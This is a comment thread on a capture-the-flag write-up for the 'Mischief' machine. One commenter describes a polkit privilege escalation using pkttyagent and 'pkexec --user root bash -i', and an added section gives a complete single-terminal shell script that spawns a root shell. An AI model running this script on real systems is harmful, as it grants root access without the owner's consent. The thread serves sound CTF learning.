Mischief by 0xdf

A couple highlights:

  • Neat ICMP exfil script in Beyond Root
  • Got RCE without needing creds to the IPv6 site

Thanks for this,

Didn’t know it could be done via systemd

Thanks for the write up :3

Here’s another way for privesc.

Open 2 terminals and log in as loki via SSH in both of them:

  1. In the first terminal, get bash’s PID: echo $$
  2. Then in the second one, run a polkit agent for the first session: pkttyagent --process PID_OF_BASH
  3. Finally, spawn a root shell using pkexec: pkexec --user root bash -i
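
The steps above, collapsed into a single terminal. This is an added example and not @fjv’s script or anything from the box: the text-mode polkit agent is backgrounded in the same shell instead of a second SSH session, registered for this shell’s PID, and pkexec is then run in the foreground. It assumes, as the comment does, that polkit accepts loki’s password at the agent prompt; the function names (is_setuid_root, polkit_privesc_preflight, polkit_privesc) and the `run` argument are mine.

```bash
#!/bin/sh
# Added example (not from the thread): one-terminal variant of the
# pkttyagent + pkexec privesc described above. Assumes polkit will accept
# the current user's password at the agent prompt. Function names are
# hypothetical helpers written for this example.

# Return 0 if $1 exists, is setuid, and is owned by root. pkexec has to be
# setuid root or it cannot raise privileges at all, so this is the first
# thing to check before bothering with an agent.
is_setuid_root() {
    [ -f "$1" ] && [ -u "$1" ] && [ "$(stat -c %u "$1" 2>/dev/null)" = "0" ]
}

# Return 0 if both polkit tools the technique needs are on PATH and pkexec
# is setuid root; otherwise print the reason to stderr and return 1.
polkit_privesc_preflight() {
    pkexec_bin=$(command -v pkexec 2>/dev/null) || { echo "pkexec not found" >&2; return 1; }
    command -v pkttyagent >/dev/null 2>&1 || { echo "pkttyagent not found" >&2; return 1; }
    is_setuid_root "$pkexec_bin" || { echo "$pkexec_bin is not setuid root" >&2; return 1; }
    return 0
}

# Start a text agent for this shell's PID in the background, then run pkexec
# in the foreground. pkttyagent opens the controlling tty itself to ask for
# the password, so it still prompts even though it is a background job.
polkit_privesc() {
    polkit_privesc_preflight || return 1
    pkttyagent --process "$$" &
    agent_pid=$!
    sleep 1  # give the agent a moment to register with polkitd
    pkexec --user root bash -i
    rc=$?
    kill "$agent_pid" 2>/dev/null
    return "$rc"
}

# Only fire when invoked as "sh polkit_privesc.sh run", so the file can also
# be sourced for its helper functions.
if [ "$#" -gt 0 ] && [ "$1" = "run" ]; then
    polkit_privesc
fi
```

From loki’s SSH session: `sh polkit_privesc.sh run`, enter loki’s password at the polkit prompt, and you should land in a root bash. If the preflight fails, the message tells you which prerequisite (pkexec, pkttyagent, or the setuid bit) is missing, which is also the quickest way to tell whether this route is worth trying on another box.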

nice write up

Woah, that’s awesome @fjv. I’m going to need to look into that more.